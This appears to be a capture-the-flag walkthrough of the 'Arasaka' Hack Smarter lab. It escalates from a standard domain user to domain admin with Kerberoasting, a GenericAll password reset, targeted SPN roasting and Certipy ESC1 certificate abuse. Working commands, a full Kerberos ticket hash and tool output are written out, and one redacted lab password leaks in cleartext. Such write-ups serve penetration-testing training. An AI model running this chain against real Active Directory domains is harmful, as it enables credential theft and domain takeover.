Hacksmarter: Arasaka


Arasaka

Objective and Scope

You are a member of the Hack Smarter Red Team. This penetration test will operate under an assumed breach scenario, starting with valid credentials for a standard domain user, faraday.

The primary goal is to simulate a realistic attack, identifying and exploiting vulnerabilities to escalate privileges from a standard user to a Domain Administrator.


Summary

Assumed breached user account: Faraday
Credentials found with kerboroasting : alt.svc
alt.svc has GenericAll rights for Yorinobu
Yorinobu is part of the Remote Desktop group
Yorinobu has GenericWrite on soulkiller.svc
Set SPN to soulkiller.svc and retrieve the hash
soulkiller.svc has certificate ESC1 abuse
Retrieve hash for domain admin the_emperor

NMAP

PORT     STATE SERVICE       VERSION
53/tcp   open  domain        Simple DNS Plus
88/tcp   open  kerberos-sec  Microsoft Windows Kerberos (server time: 2025-11-02 11:44:11Z)
135/tcp  open  msrpc         Microsoft Windows RPC
139/tcp  open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: hacksmarter.local0., Site: Default-First-Site-Name)
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=DC01.hacksmarter.local
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:DC01.hacksmarter.local
| Not valid before: 2025-09-21T15:35:32
|_Not valid after:  2026-09-21T15:35:32
445/tcp  open  microsoft-ds?
464/tcp  open  kpasswd5?
593/tcp  open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp  open  ssl/ldap      Microsoft Windows Active Directory LDAP (Domain: hacksmarter.local0., Site: Default-First-Site-Name)
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=DC01.hacksmarter.local
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:DC01.hacksmarter.local
| Not valid before: 2025-09-21T15:35:32
|_Not valid after:  2026-09-21T15:35:32
3268/tcp open  ldap          Microsoft Windows Active Directory LDAP (Domain: hacksmarter.local0., Site: Default-First-Site-Name)
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=DC01.hacksmarter.local
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:DC01.hacksmarter.local
| Not valid before: 2025-09-21T15:35:32
|_Not valid after:  2026-09-21T15:35:32
3269/tcp open  ssl/ldap      Microsoft Windows Active Directory LDAP (Domain: hacksmarter.local0., Site: Default-First-Site-Name)
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=DC01.hacksmarter.local
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:DC01.hacksmarter.local
| Not valid before: 2025-09-21T15:35:32
|_Not valid after:  2026-09-21T15:35:32
3389/tcp open  ms-wbt-server Microsoft Terminal Services
|_ssl-date: 2025-11-02T11:45:34+00:00; +3s from scanner time.
| rdp-ntlm-info: 
|   Target_Name: HACKSMARTER
|   NetBIOS_Domain_Name: HACKSMARTER
|   NetBIOS_Computer_Name: DC01
|   DNS_Domain_Name: hacksmarter.local
|   DNS_Computer_Name: DC01.hacksmarter.local
|   Product_Version: 10.0.20348
|_  System_Time: 2025-11-02T11:44:54+00:00
| ssl-cert: Subject: commonName=DC01.hacksmarter.local
| Not valid before: 2025-09-20T02:51:46
|_Not valid after:  2026-03-22T02:51:46
5985/tcp open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
Service Info: Host: DC01; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-security-mode: 
|   3:1:1: 
|_    Message signing enabled and required
| smb2-time: 
|   date: 2025-11-02T11:44:58
|_  start_date: N/A
|_clock-skew: mean: 2s, deviation: 0s, median: 1s

SMB Enumeration

nxc smb 10.1.18.147 -u faraday -p 'hacksmarter123' --shares
SMB         10.1.18.147     445    DC01             [*] Windows Server 2022 Build 20348 x64 (name:DC01) (domain:hacksmarter.local) (signing:True) (SMBv1:False)
SMB         10.1.18.147     445    DC01             [+] hacksmarter.local\faraday:hacksmarter123 
SMB         10.1.18.147     445    DC01             [*] Enumerated shares
SMB         10.1.18.147     445    DC01             Share           Permissions     Remark
SMB         10.1.18.147     445    DC01             -----           -----------     ------
SMB         10.1.18.147     445    DC01             ADMIN$                          Remote Admin
SMB         10.1.18.147     445    DC01             C$                              Default share
SMB         10.1.18.147     445    DC01             IPC$            READ            Remote IPC
SMB         10.1.18.147     445    DC01             NETLOGON        READ            Logon server share 
SMB         10.1.18.147     445    DC01             SYSVOL          READ            Logon server share 

No nontraditional SMB share folders observed.


User Enumeration

nxc smb 10.1.18.147 -u faraday -p 'hacksmarter123' --users
SMB         10.1.18.147     445    DC01             [*] Windows Server 2022 Build 20348 x64 (name:DC01) (domain:hacksmarter.local) (signing:True) (SMBv1:False)
SMB         10.1.18.147     445    DC01             [+] hacksmarter.local\faraday:hacksmarter123 
SMB         10.1.18.147     445    DC01             -Username-                    -Last PW Set-       -BadPW- -Description-                                               
SMB         10.1.18.147     445    DC01             Administrator                 2025-09-18 22:40:20 0       Built-in account for administering the computer/domain 
SMB         10.1.18.147     445    DC01             Guest                         <never>             0       Built-in account for guest access to the computer/domain 
SMB         10.1.18.147     445    DC01             krbtgt                        2025-09-21 02:51:44 0       Key Distribution Center Service Account 
SMB         10.1.18.147     445    DC01             Goro                          2025-09-21 15:00:31 0       Loyal to a fault 
SMB         10.1.18.147     445    DC01             alt.svc                       2025-09-21 15:07:42 0       Trapped for eternity 
SMB         10.1.18.147     445    DC01             Yorinobu                      2025-09-21 15:12:44 0        
SMB         10.1.18.147     445    DC01             Hanako                        2025-09-21 14:59:03 0       Waiting at embers 
SMB         10.1.18.147     445    DC01             Faraday                       2025-09-21 15:06:45 0        
SMB         10.1.18.147     445    DC01             Smasher                       2025-09-21 15:01:20 0        
SMB         10.1.18.147     445    DC01             Soulkiller.svc                2025-09-21 15:30:13 0       Certificate managment for soulkiller AI 
SMB         10.1.18.147     445    DC01             Hellman                       2025-09-21 15:04:19 0        
SMB         10.1.18.147     445    DC01             kei.svc                       2025-09-21 15:05:16 0       Trapped for eternity 
SMB         10.1.18.147     445    DC01             Silverhand.svc                2025-09-21 15:03:10 0       Trapped for eternity 
SMB         10.1.18.147     445    DC01             Oda                           2025-09-21 15:02:14 0        
SMB         10.1.18.147     445    DC01             the_emperor                   2025-09-21 14:55:52 0        
SMB         10.1.18.147     445    DC01             [*] Enumerated 15 local users: HACKSMARTER

Consolidate the users into a list.


Password Spray

Unable to find any password reuse.


Keberoasting

nxc ldap 10.1.18.147 -u faraday -p 'hacksmarter123' --kerberoasting kerberoasting_nxc.txt
SMB         10.1.18.147     445    DC01             [*] Windows Server 2022 Build 20348 x64 (name:DC01) (domain:hacksmarter.local) (signing:True) (SMBv1:False)
LDAP        10.1.18.147     389    DC01             [+] hacksmarter.local\faraday:hacksmarter123 
LDAP        10.1.18.147     389    DC01             Bypassing disabled account krbtgt 
LDAP        10.1.18.147     389    DC01             [*] Total of records returned 1
LDAP        10.1.18.147     389    DC01             sAMAccountName: alt.svc memberOf:  pwdLastSet: 2025-09-21 11:07:42.894050 lastLogon:<never>
LDAP        10.1.18.147     389    DC01             $krb5tgs$23$*alt.svc$HACKSMARTER.LOCAL$hacksmarter.local/alt.svc*$ac3f423000ae0197d0df17e1d6a08df0$b59a3cbb03ce6b9b2c03a2959218765522a4ebf2b88682f5641777d4ae3fc8b76642d1aa6090eb4c002aa34c23612ccfe70ad68b5e8b5a6570e9a2ad77eef20cc7d26a10c3a0c0a4fc0d50342e22badee90b64211e7548cb5cef9a75419aa1bca5183acfbce77fe0ab9f21f41ded6519eec68372630ccf05a80bdad61231777b7b51c92eb0ef7700dc12ba65ee8f4c2018ac77c9a5ea41f5d7255053fec9cd947fcf04809b04ade927bfef37c8b03609bfca0c18b0c6c7976028441f8727dec1b2ba76b561617bb34a14911676fed5d9b6768060ee1a0f8cbcf1f99dca2a97778de0f907da4f952f14c6ae8a5a211480489ea4cee34bbc16a415c839143ab1a67a2eff6d5be40f5008d7a155a31b1b642695c2d54285b9bf4b3ca8fac7106150b51b01b586d8aecc74282ecb2e8b7fede7deded78d656917934fe5212f3205ccf54e49a00477ccf948b4dad43b20f65ef3d75bd2685cc4a7c1dd69bf45c2016d2ab298403dc427ca4a8c320b0cb1bf6cadbf65acd804d261e4b959fe18699d825af1f9f9d940ab6ac085fed6f572bbe0d144e08dcb88b01ac534faa6fac3d199f6b39b7e60ab407f0b130c8cce69cad4b07b8043936fde8dfe9411df6f6dc0f8875530030e501a95903e2a36fba30667f5b3a10329d0997e89cdad8a31552fc2f9aba1452c7f1b502e9ed3a1d5b750f147e3a35ff5d9c53fec0a8ff98e31afbd88f4e53f720101b635c82b02fc93e0cd8a6d56741b7340670747c6bb9390106825b1e92aa7264d5ac81ea1615dec7223347bb34aed3454793d26f7a347f45968cb5d0cc23c1a19bd53ec0d6f0516251510382d18f8a0577b3be0d52a20a421d65cb4c551077d891f23f80cfdc3b52447a3df003f8ba6bc44a30db1497af52b0d257c59d9bed6f06ecd66ed7acb36b1dcce5e9faa58c5cda9cec9e9f257df20f073a94be2d3301a8315f6b043340170dd0c5372d318ef6bf8c0f48fd43d949ad97cf3c2e40ea31d76c114ca2613c4e1f52cd59ca030b15d428bbe813dd8e50d3d557700cccf9fb067c12d6546dd2f5a3a1eea3a47728f871518328c9d7451acc0a71522c2e9e1246154c31ca3d861aeb82dc9a93e5894330bdbd965a2bd0673ef0e75e59663b9221b51253dac0b243bdc26895ccc3d3091a94fec72d40595a73981b5aef1e8f12e14300394369a02e631f8ba263d9b03b6fbf18c903c0d953a42b9d9d9ae32799c259bff272873e5c79b89bb248e99941905b099ae0c0834005223a4aae0b938caf53b2f25d68a9f4e8f316dc7951f519dffdf5fe8576c05ec9103ce4ffa14b7680c866a76266b1c92198a180b7178c304b9f3e9f0b676d18c33f40759c1a4ebd3e6ba82cb91b7ee879efe3bf7a5fc2219aaf0a01e6b0bd5d4e3f10b7634080a310359e52ad263e3239de6d0538097e9e3b9f5c49782b79648922c1600d95664d985d0436b1fd0c4a46ecf9cd51eac3776f8d1aabb2bb427aff7d3652e1b977543cc0e2e6c23f71d2de5cfe16b354fc4801cea  

Found an account: alt.svc

Password cracked: alt.svc:xxxxxxx


Enumeration with alt.svc

SMB Enumeration

nxc smb 10.1.18.147 -u alt.svc -p 'xxxxxx' --shares
SMB         10.1.18.147     445    DC01             [*] Windows Server 2022 Build 20348 x64 (name:DC01) (domain:hacksmarter.local) (signing:True) (SMBv1:False)
SMB         10.1.18.147     445    DC01             [+] hacksmarter.local\alt.svc:babygirl1 
SMB         10.1.18.147     445    DC01             [*] Enumerated shares
SMB         10.1.18.147     445    DC01             Share           Permissions     Remark
SMB         10.1.18.147     445    DC01             -----           -----------     ------
SMB         10.1.18.147     445    DC01             ADMIN$                          Remote Admin
SMB         10.1.18.147     445    DC01             C$                              Default share
SMB         10.1.18.147     445    DC01             IPC$            READ            Remote IPC
SMB         10.1.18.147     445    DC01             NETLOGON        READ            Logon server share 
SMB         10.1.18.147     445    DC01             SYSVOL          READ            Logon server share 

Bloodhound

ALT.SVC has GenericAll permission to YORINOBU

net rpc password "yorinobu" "newP@ssword2022" -U "hacksmarter.local"/"alt.svc"%"xxxx" -S "hacksmarter.local"

Targeted Keberoasting: Add Service Principal Name (SPN) to Target User Account

bloodyAD -d "hacksmarter.local" --host "10.1.56.220" -u "yorinobu" -p "newP@ssword2022" set object "soulkiller.svc" servicePrincipalName -v 'http/anything'
[+] soulkiller.svc's servicePrincipalName has been updated
nxc ldap 10.1.56.220 -u yorinobu -p 'newP@ssword2022' --kerberoasting kerberoastables.txt

hashcat -m 13100 soulkiller.svc.hash /usr/share/wordlists/rockyou.txt --force

After some time of enumeration found a way with certificate abuse.

certipy find -u 'soulkiller.svc@hacksmarter.local' -p 'xxxxxxxx' -dc-ip '10.1.56.220' -vulnerable -stdout

Certipy v4.8.2 - by Oliver Lyak (ly4k)

[*] Finding certificate templates
[*] Found 34 certificate templates
[*] Finding certificate authorities
[*] Found 1 certificate authority
[*] Found 12 enabled certificate templates
[*] Trying to get CA configuration for 'hacksmarter-DC01-CA' via CSRA
[!] Got error while trying to get CA configuration for 'hacksmarter-DC01-CA' via CSRA: CASessionError: code: 0x80070005 - E_ACCESSDENIED - General access denied error.
[*] Trying to get CA configuration for 'hacksmarter-DC01-CA' via RRP
[!] Failed to connect to remote registry. Service should be starting now. Trying again...
[*] Got CA configuration for 'hacksmarter-DC01-CA'
[*] Enumeration output:
Certificate Authorities
  0
    CA Name                             : hacksmarter-DC01-CA
    DNS Name                            : DC01.hacksmarter.local
    Certificate Subject                 : CN=hacksmarter-DC01-CA, DC=hacksmarter, DC=local
    Certificate Serial Number           : 1DBC9F9ECF287FB04FDE66106578611F
    Certificate Validity Start          : 2025-09-21 15:32:14+00:00
    Certificate Validity End            : 2030-09-21 15:42:14+00:00
    Web Enrollment                      : Disabled
    User Specified SAN                  : Disabled
    Request Disposition                 : Issue
    Enforce Encryption for Requests     : Enabled
    Permissions
      Owner                             : HACKSMARTER.LOCAL\Administrators
      Access Rights
        ManageCertificates              : HACKSMARTER.LOCAL\Administrators
                                          HACKSMARTER.LOCAL\Domain Admins
                                          HACKSMARTER.LOCAL\Enterprise Admins
        ManageCa                        : HACKSMARTER.LOCAL\Administrators
                                          HACKSMARTER.LOCAL\Domain Admins
                                          HACKSMARTER.LOCAL\Enterprise Admins
        Enroll                          : HACKSMARTER.LOCAL\Authenticated Users
Certificate Templates
  0
    Template Name                       : AI_Takeover
    Display Name                        : AI_Takeover
    Certificate Authorities             : hacksmarter-DC01-CA
    Enabled                             : True
    Client Authentication               : True
    Enrollment Agent                    : False
    Any Purpose                         : False
    Enrollee Supplies Subject           : True
    Certificate Name Flag               : EnrolleeSuppliesSubject
    Enrollment Flag                     : PublishToDs
                                          IncludeSymmetricAlgorithms
    Private Key Flag                    : ExportableKey
    Extended Key Usage                  : Client Authentication
                                          Secure Email
                                          Encrypting File System
    Requires Manager Approval           : False
    Requires Key Archival               : False
    Authorized Signatures Required      : 0
    Validity Period                     : 1 year
    Renewal Period                      : 6 weeks
    Minimum RSA Key Length              : 2048
    Permissions
      Enrollment Permissions
        Enrollment Rights               : HACKSMARTER.LOCAL\Soulkiller.svc
                                          HACKSMARTER.LOCAL\Domain Admins
                                          HACKSMARTER.LOCAL\Enterprise Admins
      Object Control Permissions
        Owner                           : HACKSMARTER.LOCAL\Administrator
        Write Owner Principals          : HACKSMARTER.LOCAL\Domain Admins
                                          HACKSMARTER.LOCAL\Enterprise Admins
                                          HACKSMARTER.LOCAL\Administrator
        Write Dacl Principals           : HACKSMARTER.LOCAL\Domain Admins
                                          HACKSMARTER.LOCAL\Enterprise Admins
                                          HACKSMARTER.LOCAL\Administrator
        Write Property Principals       : HACKSMARTER.LOCAL\Domain Admins
                                          HACKSMARTER.LOCAL\Enterprise Admins
                                          HACKSMARTER.LOCAL\Administrator
    [!] Vulnerabilities
      ESC1                              : 'HACKSMARTER.LOCAL\\Soulkiller.svc' can enroll, enrollee supplies subject and template allows client authentication
certipy req -u 'soulkiller.svc@hacksmarter.local' -p 'xxxxxxx' -dc-ip '10.1.56.220' -target 'hacksmarter.local' -ca 'hacksmarter-DC01-CA' -template 'AI_Takeover' -upn 'the_emperor@hacksmarter.local'  
Certipy v4.8.2 - by Oliver Lyak (ly4k)

[*] Requesting certificate via RPC
[*] Successfully requested certificate
[*] Request ID is 5
[*] Got certificate with UPN 'the_emperor@hacksmarter.local'
[*] Certificate has no object SID
[*] Saved certificate and private key to 'the_emperor.pfx'
certipy auth -pfx the_emperor.pfx -dc-ip 10.1.56.220 
Certipy v4.8.2 - by Oliver Lyak (ly4k)

[*] Using principal: the_emperor@hacksmarter.local
[*] Trying to get TGT...
[*] Got TGT
[*] Saved credential cache to 'the_emperor.ccache'
[*] Trying to retrieve NT hash for 'the_emperor'
[*] Got hash for 'the_emperor@hacksmarter.local': aad3b435b51404eeaad3b435b51404ee:xxxxxxxxxxxx
*Evil-WinRM* PS C:\Users\the_emperor\Documents> whoami 
hacksmarter\the_emperor
*Evil-WinRM* PS C:\Users\the_emperor\Documents> hostname
DC01